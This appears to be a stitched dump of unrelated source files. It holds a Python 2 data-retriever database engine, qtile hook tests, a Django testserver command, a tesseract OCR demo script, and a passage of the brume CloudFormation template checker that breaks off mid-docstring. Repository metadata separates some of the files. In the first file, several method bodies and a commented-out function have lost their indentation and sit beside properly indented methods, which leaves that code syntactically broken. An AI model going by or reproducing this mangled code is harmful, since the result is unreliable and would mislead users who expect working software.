    def auto_create_table(self, table, url=None, filename=None, pk=None):
        """Creates a table automatically by analyzing a data source and
        predicting column names, data types, delimiter, etc.

        :param table: Table object to configure and create
        :param url: optional URL to download the source from if not local
        :param filename: local file name (derived from url if omitted)
        :param pk: name of an existing column to use as the primary key;
                   when None an auto-increment 'record_id' column is added
        """
        if url and not filename:
            filename = filename_from_url(url)
        self.table = table
        if url and not self.find_file(filename):
            # If the file doesn't exist, download it
            self.download_file(url, filename)
        file_path = self.find_file(filename)
        # First pass: skip to the column-names row and read the header line.
        source = (skip_rows,
                  (self.table.column_names_row - 1,
                   (open, (file_path, "rb"))))
        lines = gen_from_source(source)
        header = lines.next()
        lines.close()
        # Second pass (data rows only) feeds the datatype detection below.
        source = (skip_rows,
                  (self.table.header_rows,
                   (open, (file_path, "rb"))))
        if not self.table.delimiter:
            self.auto_get_delimiter(header)
        if not self.table.columns:
            lines = gen_from_source(source)
            if pk is None:
                self.table.columns = [("record_id", ("pk-auto",))]
            else:
                self.table.columns = []
                self.table.contains_pk = True
            columns, column_values = self.table.auto_get_columns(header)
            self.auto_get_datatypes(pk, lines, columns, column_values)
        # For cross-tab tables, insert the ct name column just before the
        # value column if it is not already present.
        if self.table.columns[-1][1][0][:3] == "ct-" and hasattr(self.table, "ct_names") and not self.table.ct_column in [c[0] for c in self.table.columns]:
            self.table.columns = self.table.columns[:-1] + [(self.table.ct_column, ("char", 20))] + [self.table.columns[-1]]
        self.create_table()
# def auto_get_datatypes(self, pk, source, columns, column_values):
# """Determines data types for each column."""
# # Get all values for each column
# if hasattr(self, 'scan_lines'):
# lines = int(self.scan_lines)
# lines_to_scan = []
# n = 0
# while n < lines:
# lines_to_scan.append(source.next())
# n += 1
# else:
# lines_to_scan = source
#
# column_types = [('int',) for i in range(len(columns))]
# max_lengths = [0 for i in range(len(columns))]
#
# # Check the values for each column to determine data type
# for line in lines_to_scan:
# if line.replace("\t", "").strip():
# values = self.table.extract_values(line.strip("\n"))
# for i in range(len(columns)):
# try:
# value = values[i]
#
# if self.table.cleanup.function != no_cleanup:
# value = self.table.cleanup.function(value, self.table.cleanup.args)
#
# if value != None and value != '':
# if len(str(value)) > max_lengths[i]:
# max_lengths[i] = len(str(value))
#
# if column_types[i][0] in ('int', 'bigint'):
# try:
# value = int(value)
# if column_types[i][0] == 'int' and hasattr(self, 'max_int') and value > self.max_int:
# column_types[i] = ['bigint',]
# except:
# column_types[i] = ['double',]
# if column_types[i][0] == 'double':
# try:
# value = float(value)
# if "e" in str(value) or ("." in str(value) and
# len(str(value).split(".")[1]) > 10):
# column_types[i] = ["decimal","30,20"]
# except:
# column_types[i] = ['char',max_lengths[i]]
# if column_types[i][0] == 'char':
# if len(str(value)) > column_types[i][1]:
# column_types[i][1] = max_lengths[i]
#
# except IndexError:
# pass
#
#
# for i in range(len(columns)):
# column = columns[i]
# column[1] = column_types[i]
# if pk == column[0]:
# column[1][0] = "pk-" + column[1][0]
#
# for column in columns:
# self.table.columns.append((column[0], tuple(column[1])))
def auto_get_delimiter(self, header):
# Determine the delimiter by finding out which of a set of common
# delimiters occurs most in the header line
self.table.delimiter = "\t"
for other_delimiter in [",", ";"]:
if header.count(other_delimiter) > header.count(self.table.delimiter):
self.table.delimiter = other_delimiter
    def convert_data_type(self, datatype):
        """Converts generic data types to database platform specific
        data types.

        :param datatype: tuple of (generic type name, optional size); the
                         name may carry a 'pk-' (primary key) or 'ct-'
                         (cross-tab) prefix.
        :return: platform type string, wrapped in pkformat for primary keys.
        """
        thistype = datatype[0]
        thispk = False
        if thistype[0:3] == "pk-":
            # NOTE(review): lstrip strips the *characters* 'p','k','-', not
            # the prefix; fine for current names like 'pk-auto'/'pk-int' but
            # would corrupt a type whose name starts with p, k, or '-'.
            thistype = thistype.lstrip("pk-")
            thispk = True
        elif thistype[0:3] == "ct-":
            thistype = thistype[3:]
        if thistype in self.datatypes.keys():
            thistype = self.datatypes[thistype]
            if isinstance(thistype, tuple):
                # Tuple mapping: (unsized form, sized form); choose by size.
                if len(datatype) > 1 and datatype[1] > 0:
                    thistype = thistype[1] + "(" + str(datatype[1]) + ")"
                else:
                    thistype = thistype[0]
            else:
                if len(datatype) > 1 and datatype[1] > 0:
                    thistype += "(" + str(datatype[1]) + ")"
        else:
            # Unknown generic type: emit an empty type string.
            thistype = ""
        if thispk:
            thistype = self.pkformat % thistype
        return thistype
    def create_db(self):
        """Creates a new database based on settings supplied in Database object
        engine.db. Failures are reported but not fatal (the database may
        already exist)."""
        db_name = self.database_name()
        if db_name:
            print "Creating database " + db_name + "..."
            # Create the database
            create_stmt = self.create_db_statement()
            if self.debug: print create_stmt
            try:
                self.execute(create_stmt)
            except Exception as e:
                # Roll back the failed statement (best effort) and continue.
                try: self.connection.rollback()
                except: pass
                print "Couldn't create database (%s). Trying to continue anyway." % e
def create_db_statement(self):
"""Returns a SQL statement to create a database."""
create_stmt = "CREATE DATABASE " + self.database_name()
return create_stmt
    def create_raw_data_dir(self):
        """Checks to see if the archive directory exists and creates it if
        necessary."""
        path = self.format_data_dir()
        # makedirs creates intermediate directories as needed.
        if not os.path.exists(path):
            os.makedirs(path)
    def create_table(self):
        """Creates a new database table based on settings supplied in Table
        object engine.table. Any existing table of the same name is dropped
        first; creation failures are reported but not fatal."""
        print "Creating table " + self.table_name() + "..."
        # Try to drop the table if it exists; this may cause an exception if it
        # doesn't exist, so ignore exceptions
        try:
            self.execute(self.drop_statement("TABLE", self.table_name()))
        except:
            pass
        create_stmt = self.create_table_statement()
        if self.debug: print create_stmt
        try:
            self.execute(create_stmt)
        except Exception as e:
            # Roll back the failed statement (best effort) and continue.
            try: self.connection.rollback()
            except: pass
            print "Couldn't create table (%s). Trying to continue anyway." % e
    def create_table_statement(self):
        """Returns a SQL statement to create a table.

        Column types come from convert_data_type(); only columns returned by
        table.get_insert_columns() are included, in that order."""
        create_stmt = "CREATE TABLE " + self.table_name() + " ("
        columns = self.table.get_insert_columns(join=False)
        types = []
        for column in self.table.columns:
            for column_name in columns:
                if column[0] == column_name:
                    types.append(self.convert_data_type(column[1]))
        if self.debug: print columns
        # Assemble "name type" pairs into a comma-separated column list.
        column_strings = []
        for c, t in zip(columns, types):
            column_strings.append(c + ' ' + t)
        create_stmt += ', '.join(column_strings)
        create_stmt += " );"
        return create_stmt
def database_name(self, name=None):
if not name:
try:
name = self.script.shortname
except AttributeError:
name = "{db}"
try:
db_name = self.opts["database_name"].format(db=name)
except KeyError:
db_name = name
return db_name
    def download_file(self, url, filename, clean_line_endings=True):
        """Downloads a file to the raw data directory.

        Skipped when a local copy already exists. Unless the extension marks
        the file as binary (exe/zip/xls) and clean_line_endings is True,
        CR/LF and CR line endings are normalized to LF.
        """
        if not self.find_file(filename):
            path = self.format_filename(filename)
            self.create_raw_data_dir()
            print "Downloading " + filename + "..."
            # NOTE: `file` shadows the Python 2 builtin of the same name here.
            file = urllib.urlopen(url)
            local_file = open(path, 'wb')
            if clean_line_endings and (filename.split('.')[-1].lower() not in ["exe", "zip", "xls"]):
                local_file.write(file.read().replace("\r\n", "\n").replace("\r", "\n"))
            else:
                local_file.write(file.read())
            local_file.close()
            file.close()
def download_files_from_archive(self, url, filenames, filetype="zip",
                                keep_in_dir=False, archivename=None):
    """Download an archive and extract the named members into the raw
    data directory.

    url -- location of the archive
    filenames -- archive member names to extract
    filetype -- one of 'zip', 'gz' or 'tar'
    keep_in_dir -- when True, extract into a per-dataset subdirectory
    archivename -- local name for the downloaded archive; defaults to
        the file name implied by the url
    """
    downloaded = False
    if archivename:
        archivename = self.format_filename(archivename)
    else:
        archivename = self.format_filename(filename_from_url(url))
    if keep_in_dir:
        archivebase = os.path.splitext(os.path.basename(archivename))[0]
        archivedir = os.path.join(DATA_WRITE_PATH, archivebase)
        archivedir = archivedir.format(dataset=self.script.shortname)
        if not os.path.exists(archivedir):
            os.makedirs(archivedir)
    else:
        archivebase = ''
    for filename in filenames:
        if self.find_file(os.path.join(archivebase, filename)):
            # Use local copy
            pass
        else:
            self.create_raw_data_dir()
            if not downloaded:
                # Download the archive once, on the first cache miss; keep
                # raw line endings so binary archives are not corrupted.
                self.download_file(url, archivename, clean_line_endings=False)
                downloaded = True
            if filetype == 'zip':
                archive = zipfile.ZipFile(archivename)
                open_archive_file = archive.open(filename)
            elif filetype == 'gz':
                # gzip archives can only contain a single file
                open_archive_file = gzip.open(archivename)
            elif filetype == 'tar':
                # BUG FIX: open the downloaded archive (archivename), not
                # the member name -- the original opened `filename`, which
                # does not exist on disk.
                archive = tarfile.open(archivename)
                open_archive_file = archive.extractfile(filename)
            fileloc = self.format_filename(os.path.join(archivebase,
                                                        os.path.basename(filename)))
            unzipped_file = open(fileloc, 'wb')
            for line in open_archive_file:
                unzipped_file.write(line)
            open_archive_file.close()
            unzipped_file.close()
            # `archive` is only bound for zip/tar; gzip has no container.
            if 'archive' in locals(): archive.close()
def drop_statement(self, objecttype, objectname):
    """Build a "DROP <objecttype> IF EXISTS <objectname>" SQL statement."""
    return "DROP {0} IF EXISTS {1}".format(objecttype, objectname)
def escape_single_quotes(self, value):
    """Backslash-escape every single-quote character in value."""
    return "\\'".join(value.split("'"))
def escape_double_quotes(self, value):
    """Backslash-escape every double-quote character in value."""
    return '\\"'.join(value.split('"'))
def execute(self, statement, commit=True):
    """Run a SQL statement on the engine's cursor, committing by default."""
    self.cursor.execute(statement)
    if commit:
        self.connection.commit()
def exists(self, script):
    """Return True when a table already exists for every non-empty key
    in the script's urls mapping."""
    return all([self.table_exists(
        script.shortname,
        key
    )
        for key in script.urls.keys() if key])
def final_cleanup(self):
    """Close the database connection."""
    # Print any warnings accumulated during the run before disconnecting.
    if self.warnings:
        print '\n'.join(str(w) for w in self.warnings)
    self.disconnect()
def find_file(self, filename):
    """Search the configured data directories for filename.

    Returns the full path of the first existing, non-empty match, or
    False when the file is not found in any search path.
    """
    for search_path in DATA_SEARCH_PATHS:
        # Search paths contain a {dataset} placeholder.
        search_path = search_path.format(dataset=self.script.shortname)
        file_path = os.path.join(search_path, filename)
        if file_exists(file_path):
            return file_path
    return False
def format_data_dir(self):
    """Returns the correctly formatted raw data directory location."""
    return DATA_WRITE_PATH.format(dataset=self.script.shortname)
def format_filename(self, filename):
    """Returns the full path of a file in the archive directory."""
    return os.path.join(self.format_data_dir(), filename)
def format_insert_value(self, value, datatype):
    """Format a value for an insert statement.

    Null-like or empty values become the literal "null"; integer types
    are truncated at the decimal point and converted to int; character
    types are escaped according to the table's flags and wrapped in
    single quotes; unrecognized types yield "null".
    """
    datatype = datatype.split('-')[-1]
    strvalue = str(value).strip()
    # Strip one layer of matching surrounding quotes, if present.
    if len(strvalue) > 1 and strvalue[0] == strvalue[-1] and strvalue[0] in ("'", '"'):
        strvalue = strvalue[1:-1]
    nulls = ("null", "none")
    if strvalue.lower() in nulls:
        return "null"
    if datatype in ("int", "bigint", "bool"):
        # Drop any fractional part before converting; empty -> null.
        if strvalue:
            whole = strvalue.split('.')[0]
            if whole:
                return int(whole)
        return "null"
    if datatype in ("double", "decimal"):
        return strvalue if strvalue else "null"
    if datatype == "char":
        if strvalue.lower() in nulls:
            return "null"
        # automatically escape quotes in string fields
        if getattr(self.table, "escape_double_quotes", False):
            strvalue = self.escape_double_quotes(strvalue)
        if getattr(self.table, "escape_single_quotes", False):
            strvalue = self.escape_single_quotes(strvalue)
        return "'" + strvalue + "'"
    return "null"
def get_cursor(self):
    """Gets the db cursor."""
    # Lazily create the cursor on first access and cache it.
    if self._cursor is None:
        self._cursor = self.connection.cursor()
    return self._cursor
cursor = property(get_cursor)
def get_input(self):
    """Manually get user input for connection information when script is
    run from terminal.

    Each entry of self.required_opts looks like (name, prompt, default);
    only options missing from self.opts are asked for.
    """
    for opt in self.required_opts:
        if not (opt[0] in self.opts.keys()):
            if opt[0] == "password":
                # Use getpass so the password is not echoed.
                print opt[1]
                self.opts[opt[0]] = getpass.getpass(" ")
            else:
                prompt = opt[1]
                if opt[2]:
                    prompt += " or press Enter for the default, %s" % opt[2]
                prompt += ': '
                self.opts[opt[0]] = raw_input(prompt)
                # An empty answer or the word "default" selects the default.
                if self.opts[opt[0]] in ["", "default"]:
                    self.opts[opt[0]] = opt[2]
def insert_data_from_archive(self, url, filenames):
    """Insert data from files located in an online archive. This function
    extracts the file, inserts the data, and deletes the file if raw data
    archiving is not set."""
    self.download_files_from_archive(url, filenames)
    for filename in filenames:
        file_path = self.find_file(filename)
        if file_path:
            self.insert_data_from_file(file_path)
        else:
            raise Exception("File not found: %s" % filename)
def insert_data_from_file(self, filename):
    """The default function to insert data from a file. This function
    simply inserts the data row by row. Database platforms with support
    for inserting bulk data from files can override this function."""
    # Source tuple: lazily re-opens the file and skips the header rows on
    # each (re)generation -- see gen_from_source()/skip_rows().
    data_source = (skip_rows,
                   (self.table.header_rows,
                    (open, (filename, 'r'))))
    self.add_to_table(data_source)
def insert_data_from_url(self, url):
    """Insert data from a web resource, such as a text file."""
    filename = filename_from_url(url)
    find = self.find_file(filename)
    if find:
        # Use local copy
        self.insert_data_from_file(find)
    else:
        # Save a copy of the file locally, then load from that file
        self.create_raw_data_dir()
        print "Saving a copy of " + filename + "..."
        self.download_file(url, filename)
        self.insert_data_from_file(self.find_file(filename))
def insert_statement(self, values):
    """Returns a SQL statement to insert a set of values.

    Missing trailing values are padded with formatted nulls so the
    value count matches the column count before interpolation.
    """
    columns = self.table.get_insert_columns()
    types = self.table.get_column_datatypes()
    columncount = len(self.table.get_insert_columns(False))
    insert_stmt = "INSERT INTO " + self.table_name()
    insert_stmt += " (" + columns + ")"
    insert_stmt += " VALUES ("
    # One %s placeholder per column; the trailing ", " is stripped below.
    for i in range(0, columncount):
        insert_stmt += "%s, "
    insert_stmt = insert_stmt.rstrip(", ") + ");"
    n = 0
    # Pad with nulls until there is a value for every placeholder.
    while len(values) < insert_stmt.count("%s"):
        values.append(self.format_insert_value(None,
                                               types[n]))
        n += 1
    insert_stmt %= tuple([str(value) for value in values])
    if self.debug: print insert_stmt
    return insert_stmt
def table_exists(self, dbname, tablename):
    """Hook for engines that can check table existence.

    The base implementation always reports that the table is absent;
    engine subclasses override this with a real check.
    """
    return False
def table_name(self, name=None, dbname=None):
    """Return the full table name.

    Defaults to the current table's name and the engine's database
    name, then applies the configurable 'table_name' template.
    """
    name = name or self.table.name
    if not dbname:
        dbname = self.database_name() or ''
    return self.opts["table_name"].format(db=dbname, table=name)
def warning(self, warning):
    """Record a warning, tagged with "script_shortname:table_name".

    NOTE(review): ``Warning`` here takes (location, message) positional
    args -- presumably a project-level class rather than the builtin
    exception; confirm against the module imports.
    """
    new_warning = Warning('%s:%s' % (self.script.shortname, self.table.name), warning)
    self.warnings.append(new_warning)
def skip_rows(rows, source):
    """Return an iterator over `source` with the first `rows` lines consumed.

    Used to skip table header rows before inserting data.
    """
    lines = gen_from_source(source)
    for i in range(rows):
        # Use the next() builtin instead of the Python 2-only .next()
        # method: it works on both Python 2.6+ and Python 3 iterators.
        next(lines)
    return lines
def file_exists(path):
    """Return True when `path` names an existing, non-empty regular file."""
    return os.path.isfile(path) and os.path.getsize(path) > 0
def filename_from_url(url):
    """Return the file-name portion of a URL, with any query string removed."""
    return url.split('/')[-1].split('?')[0]
def gen_from_source(source):
    """Resolve a source tuple into a generator.

    Source tuples are (callable, args) pairs where callable(*args)
    returns either a generator or another source tuple; unwrapping
    repeats until a non-tuple is produced, which allows a data source
    to be regenerated indefinitely.
    """
    while isinstance(source, tuple):
        func, args = source
        source = func(*args)
    return source
qtile/qtile | test/test_hook.py | 2 | 5257 | # Copyright (c) 2009 Aldo Cortesi
# Copyright (c) 2011 Florian Mounier
# Copyright (c) 2011 Anshuman Bhaduri
# Copyright (c) 2012 Tycho Andersen
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import asyncio
import logging
from multiprocessing import Value
import pytest
import libqtile.log_utils
import libqtile.utils
from libqtile import hook
from libqtile.resources import default_config
from test.conftest import BareConfig
# TODO: more tests required.
# 1. Check all hooks that can be fired
class Call:
    """Callable sentinel that records the most recent value passed to it."""

    def __init__(self, val):
        self.val = val

    def __call__(self, val):
        self.val = val
@pytest.fixture
def hook_fixture():
    """Silence qtile logging for the duration of a test, then clear all
    hook subscriptions on teardown."""
    libqtile.log_utils.init_log(logging.CRITICAL, log_path=None, log_color=False)
    yield
    hook.clear()
def test_cannot_fire_unknown_event():
    # Only events registered with libqtile.hook may be fired.
    with pytest.raises(libqtile.utils.QtileError):
        hook.fire("unknown")
@pytest.mark.usefixtures("hook_fixture")
def test_hook_calls_subscriber():
    # A plain callable subscriber receives fire()'s arguments synchronously.
    test = Call(0)
    hook.subscribe.group_window_add(test)
    hook.fire("group_window_add", 8)
    assert test.val == 8
@pytest.mark.usefixtures("hook_fixture")
def test_hook_calls_subscriber_async():
    # An async *function* subscriber is also run by fire().
    val = 0
    async def co(new_val):
        nonlocal val
        val = new_val
    hook.subscribe.group_window_add(co)
    hook.fire("group_window_add", 8)
    assert val == 8
@pytest.mark.usefixtures("hook_fixture")
def test_hook_calls_subscriber_async_co():
    # An already-created coroutine *object* may be subscribed directly;
    # fire() is then called without arguments.
    val = 0
    async def co(new_val):
        nonlocal val
        val = new_val
    hook.subscribe.group_window_add(co(8))
    hook.fire("group_window_add")
    assert val == 8
@pytest.mark.usefixtures("hook_fixture")
def test_hook_calls_subscriber_async_in_existing_loop():
    # When fire() happens inside a running event loop, the coroutine
    # subscriber is scheduled on that loop; sleep(0) yields control so
    # it can actually run before the assertion.
    async def t():
        val = 0
        async def co(new_val):
            nonlocal val
            val = new_val
        hook.subscribe.group_window_add(co(8))
        hook.fire("group_window_add")
        await asyncio.sleep(0)
        assert val == 8
    asyncio.run(t())
@pytest.mark.usefixtures("hook_fixture")
def test_subscribers_can_be_added_removed():
    # hook.clear() must drop every registered subscription.
    test = Call(0)
    hook.subscribe.group_window_add(test)
    assert hook.subscriptions
    hook.clear()
    assert not hook.subscriptions
@pytest.mark.usefixtures("hook_fixture")
def test_can_unsubscribe_from_hook():
    test = Call(0)
    hook.subscribe.group_window_add(test)
    hook.fire("group_window_add", 3)
    assert test.val == 3
    # After unsubscribing, further fires must not reach the callable.
    hook.unsubscribe.group_window_add(test)
    hook.fire("group_window_add", 4)
    assert test.val == 3
def test_can_subscribe_to_startup_hooks(manager_nospawn):
    # Fill in any config attributes missing from BareConfig with the
    # defaults so the manager can start.
    config = BareConfig
    for attr in dir(default_config):
        if not hasattr(config, attr):
            setattr(config, attr, getattr(default_config, attr))
    manager = manager_nospawn
    # Shared counters: the hooks run in the manager's process, so plain
    # ints would not be visible here -- use multiprocessing.Value.
    manager.startup_once_calls = Value('i', 0)
    manager.startup_calls = Value('i', 0)
    manager.startup_complete_calls = Value('i', 0)
    def inc_startup_once_calls():
        manager.startup_once_calls.value += 1
    def inc_startup_calls():
        manager.startup_calls.value += 1
    def inc_startup_complete_calls():
        manager.startup_complete_calls.value += 1
    hook.subscribe.startup_once(inc_startup_once_calls)
    hook.subscribe.startup(inc_startup_calls)
    hook.subscribe.startup_complete(inc_startup_complete_calls)
    manager.start(config)
    assert manager.startup_once_calls.value == 1
    assert manager.startup_calls.value == 1
    assert manager.startup_complete_calls.value == 1
    # Restart and check that startup_once doesn't fire again
    manager.terminate()
    manager.start(config, no_spawn=True)
    assert manager.startup_once_calls.value == 1
    assert manager.startup_calls.value == 2
    assert manager.startup_complete_calls.value == 2
@pytest.mark.usefixtures('hook_fixture')
def test_can_update_by_selection_change(manager):
    # selection_change subscribers receive the fired payload verbatim.
    test = Call(0)
    hook.subscribe.selection_change(test)
    hook.fire('selection_change', 'hello')
    assert test.val == 'hello'
@pytest.mark.usefixtures('hook_fixture')
def test_can_call_by_selection_notify(manager):
    # Same contract for the selection_notify event.
    test = Call(0)
    hook.subscribe.selection_notify(test)
    hook.fire('selection_notify', 'hello')
    assert test.val == 'hello'
| mit |
libscie/liberator | liberator/lib/python3.6/site-packages/django/core/management/commands/testserver.py | 126 | 2146 | from django.core.management import call_command
from django.core.management.base import BaseCommand
from django.db import connection
class Command(BaseCommand):
    """Management command: run a dev server backed by a throwaway test
    database pre-loaded with the given fixtures."""
    help = 'Runs a development server with data from the given fixture(s).'
    # The test database is created ad hoc in handle(), so skip the
    # normal system checks.
    requires_system_checks = False

    def add_arguments(self, parser):
        """Register the testserver command-line options."""
        parser.add_argument(
            'args', metavar='fixture', nargs='*',
            help='Path(s) to fixtures to load before running the server.',
        )
        parser.add_argument(
            '--noinput', '--no-input', action='store_false', dest='interactive', default=True,
            help='Tells Django to NOT prompt the user for input of any kind.',
        )
        parser.add_argument(
            '--addrport', default='',
            help='Port number or ipaddr:port to run the server on.',
        )
        parser.add_argument(
            '--ipv6', '-6', action='store_true', dest='use_ipv6', default=False,
            help='Tells Django to use an IPv6 address.',
        )

    def handle(self, *fixture_labels, **options):
        """Create a test database, load the fixtures, then run runserver."""
        verbosity = options['verbosity']
        interactive = options['interactive']
        # Create a test database.
        db_name = connection.creation.create_test_db(verbosity=verbosity, autoclobber=not interactive, serialize=False)
        # Import the fixture data into the test database.
        call_command('loaddata', *fixture_labels, **{'verbosity': verbosity})
        # Run the development server. Turn off auto-reloading because it causes
        # a strange error -- it causes this handle() method to be called
        # multiple times.
        shutdown_message = (
            '\nServer stopped.\nNote that the test database, %r, has not been '
            'deleted. You can explore it on your own.' % db_name
        )
        use_threading = connection.features.test_db_allows_multiple_connections
        call_command(
            'runserver',
            addrport=options['addrport'],
            shutdown_message=shutdown_message,
            use_reloader=False,
            use_ipv6=options['use_ipv6'],
            use_threading=use_threading
        )
| cc0-1.0 |
ttacon/tesseract | contrib/tesseract-c_api-demo.py | 21 | 2184 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright 2012 Zdenko Podobný
# Author: Zdenko Podobný
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Simple python demo script of tesseract-ocr 3.02 c-api
"""
import os
import sys
import ctypes
# Demo variables
lang = "eng"
filename = "../phototest.tif"
libpath = "/usr/local/lib64/"           # default *nix install location
libpath_w = "../vs2008/DLL_Release/"    # Windows build output directory
# Fall back to the source tree when TESSDATA_PREFIX is not set.
TESSDATA_PREFIX = os.environ.get('TESSDATA_PREFIX')
if not TESSDATA_PREFIX:
    TESSDATA_PREFIX = "../"
# Pick the platform-specific library name, with a bare-name fallback
# that relies on the dynamic loader's search path.
if sys.platform == "win32":
    libname = libpath_w + "libtesseract302.dll"
    libname_alt = "libtesseract302.dll"
    os.environ["PATH"] += os.pathsep + libpath_w
else:
    libname = libpath + "libtesseract.so.3.0.2"
    libname_alt = "libtesseract.so.3"
try:
    tesseract = ctypes.cdll.LoadLibrary(libname)
except:
    try:
        tesseract = ctypes.cdll.LoadLibrary(libname_alt)
    except WindowsError, err:
        print("Trying to load '%s'..." % libname)
        print("Trying to load '%s'..." % libname_alt)
        print(err)
        exit(1)
# Declare the return type before calling: ctypes defaults to int.
tesseract.TessVersion.restype = ctypes.c_char_p
tesseract_version = tesseract.TessVersion()[:4]
# We need to check library version because libtesseract.so.3 is symlink
# and can point to other version than 3.02
if float(tesseract_version) < 3.02:
    print("Found tesseract-ocr library version %s." % tesseract_version)
    print("C-API is present only in version 3.02!")
    exit(2)
api = tesseract.TessBaseAPICreate()
rc = tesseract.TessBaseAPIInit3(api, TESSDATA_PREFIX, lang);
if (rc):
    # Init failed: free the API handle before exiting.
    tesseract.TessBaseAPIDelete(api)
    print("Could not initialize tesseract.\n")
    exit(3)
# OCR the whole file and fetch the recognized text.
text_out = tesseract.TessBaseAPIProcessPages(api, filename, None , 0);
result_text = ctypes.string_at(text_out)
print result_text
| apache-2.0 |
flou/brume | brume/checker.py | 1 | 9946 | """Brume CloudFormation checker."""
import json
import logging
import os
import sys
import click
import crayons
from six import string_types
LOGGER = logging.getLogger(__name__)
logging.basicConfig(level=logging.INFO)
CFN_REF = "Ref"
CFN_GETATT = "Fn::GetAtt"
class Stack:
    """A CloudFormation Stack loaded from a JSON template."""

    def __init__(self, name):
        self.name = name
        self.outputs = {}
        self.resources = {}
        self.template_url = ""
        # Parameters that are passed when declaring the stack as a resource
        # of the main stack
        self.input_parameters = {}
        # Parameters defined in the Parameters section of the template
        self.parameters = {}

    def find(self, key):
        """
        Return a list of resources and outputs that contain `key`.
        find('Fn::GetAtt') returns the list of nodes (resources and outputs)
        that use the GetAtt function.
        >>> from brume.checker import Stack
        >>> stack = Stack('Main').load_from_file('cloudformation/Main.cform')
        >>> stack.find('Fn::GetAtt')
        """
        # Flatten the per-section match lists into one list.
        return sum(
            [list(Stack.find_nodes(nodes, key)) for nodes in [self.resources, self.outputs]], []
        )

    def missing_refs(self):
        """
        Detect missing Ref statements.
        Return a list of Ref statements that point to non-existing resources or
        parameters in the template.
        """
        return [ref for ref in self.find(CFN_REF) if not self.has_ref(ref)]

    def has_ref(self, ref):
        """
        Check that ``ref`` points to a resource that is actually declared in the
        template or in the parameters of the stack.
        """
        return ref in self.resources or ref in self.parameters

    def missing_getatt(self):
        """
        Detect missing GetAtt statements.
        Return a list of GetAtt statements that point to non-existing resources
        or parameters in the template.
        """
        return [ref for ref in self.find(CFN_GETATT) if not self.has_getatt(ref)]

    def has_getatt(self, getatt):
        """
        Check that ``getatt`` points to a resource that is actually declared in
        the template or in the parameters of the stack.
        """
        # getatt is the [LogicalName, Attribute] list form of Fn::GetAtt.
        return getatt[0] in self.resources or getatt[0] in self.parameters

    def missing_parameters(self):
        """
        Detect missing parameters.
        Return a list of parameters that are expected in the substack with no
        default value but have no parameter in the main stack.
        """
        return [
            param_name
            for param_name, param in self.parameters.items()
            if param_name not in self.input_parameters and "Default" not in param
        ]

    def extra_parameters(self):
        """
        Detect extra parameters.
        Return a list of parameters that are passed from the main stack but are
        not expected in the substack definition.
        """
        return [
            param_name
            for param_name, _ in self.input_parameters.items()
            if param_name not in self.parameters
        ]

    def load_from_file(self, name=None):
        """Create a Stack from its template.

        Exits the process with status 1 when the template file cannot
        be read.
        """
        stack_name = name if name else self.name
        try:
            with open(stack_name, "r") as f_template:
                template = json.load(f_template)
        except IOError as err:
            click.echo("Template for stack {0} not found".format(stack_name), err=True)
            click.echo(err, err=True)
            sys.exit(1)
        self.outputs = template.get("Outputs", {})
        self.parameters = template.get("Parameters", {})
        self.resources = template.get("Resources", {})
        return self

    def substacks(self):
        """Return the current stack nested stacks."""
        return {
            stack_name: substack
            for stack_name, substack in self.resources.items()
            if substack["Type"] == "AWS::CloudFormation::Stack"
        }

    def detect_parameter_name_mismatch(self):
        """Detect possible mismatch between parameter names and outputs.

        Warns (without failing) when a substack parameter is fed by an
        output whose name differs from the parameter name.
        """
        for stack_name, substack in self.substacks().items():
            for parameter_name, param in substack["Properties"].get("Parameters", {}).items():
                if CFN_GETATT in param:
                    # GetAtt to another stack looks like [Stack, "Outputs.Name"].
                    output_name = param[CFN_GETATT][1].replace("Outputs.", "")
                    if parameter_name != output_name:
                        source_stack = param[CFN_GETATT][0]
                        warning_message = (
                            "Possible parameter name mismatch: output {}.{} is given to {}.{}"
                        )
                        click.echo(
                            warning_message.format(
                                source_stack,
                                crayons.yellow(output_name),
                                stack_name,
                                crayons.yellow(parameter_name),
                            )
                        )

    @staticmethod
    def new_substack(stack_name, resource):
        """Create a substack from an AWS::CloudFormation::Stack resource."""
        newstack = Stack(stack_name)
        newstack.input_parameters = resource["Properties"].get("Parameters", {})
        newstack.template_url = resource["Properties"].get("TemplateURL", {})
        return newstack

    @staticmethod
    def aws_pseudo_parameter(v):
        """Check that `v` is an AWS pseudo-parameter (like AWS::Region) or resource type."""
        return isinstance(v, string_types) and v.upper().startswith("AWS::")

    @staticmethod
    def find_nodes(node, key):
        """
        Return nodes that match a node type and key.
        Recursively parses the template to find nodes.
        """
        # Generator that walks dicts and lists; AWS pseudo-parameters are
        # skipped so "AWS::..." strings are never reported as references.
        if isinstance(node, dict):
            for k, v in node.items():
                if Stack.aws_pseudo_parameter(v):
                    continue
                if k == key:
                    yield v
                elif isinstance(v, list):
                    for n in v:
                        for id_val in Stack.find_nodes(n, key):
                            yield id_val
                elif isinstance(v, dict):
                    for id_val in Stack.find_nodes(v, key):
                        yield id_val
        elif isinstance(node, list):
            for k in node:
                for id_val in Stack.find_nodes(k, key):
                    yield id_val
        else:
            # Scalar leaf: nothing to yield.
            return
def check_templates(template):
    """
    Checks:
    - that there are parameters sent from the main stack for every expected
    parameter in the substacks
